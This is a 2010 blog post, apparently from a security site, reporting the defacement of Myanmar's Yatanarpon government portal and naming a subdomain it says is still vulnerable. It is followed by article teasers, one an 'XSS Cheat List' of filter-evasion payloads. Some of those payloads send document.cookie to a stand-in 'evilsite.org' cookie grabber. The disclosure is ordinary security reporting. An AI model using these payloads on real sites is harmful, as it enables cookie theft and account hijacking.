According to PeopleMediaVoice, Nation Web Portal of Myanmar ( Yatanarpon Web Portal) is being hacked by a hacker group named themselves “Humpty Dumpty”, defaced home page at around 12:30 AM local time yersterday, 13/11/2010.

At the same day, they hacked another gov news agency site The Mirror Online News Paper (KyayMon) http://www.kyaymon.info/.

Now, Yatanarpon Portal is currently under maintenance, and they are trying to discover their site!

Wat i wana talk is, they are not care security in their web site, We informed XSS, SQL Injection, Bypass Login from Myanmar Web Portal last month http://www.planetcreator.net/2010/10/critical-sql-injection-in-yatanarpon-web-portal/ . I know they fixed some vul but not at all.

Now, security vulnerability are still existing in some sub domain of Yatnarpon Web Portal, such as http://job.yatnarpon.com.mm and so on…

If you want to see detail of this vulnerability Click Here (Note :- Registered Member Only- If you are not PlanetCreator.Net Member Sign up Here)

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

The Null Byte Exploit

Many web forums have mushroomed on internet and they are setup in a jiffy,so they wont pay much attention to security. An older exploit I m discussing here is The

Read More

How to find the true location of a person from chat room (Yahoo, MSN, Jabber etc)?

How to find the persons IP from chat? How to find a person’s location from MSN, yahoo … This person is trying to cheat me through chat, how can I

Read More

XSS Cheat List

<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav&#x09;ascript:alert('XSS');\"> <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\"> <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script>

Read More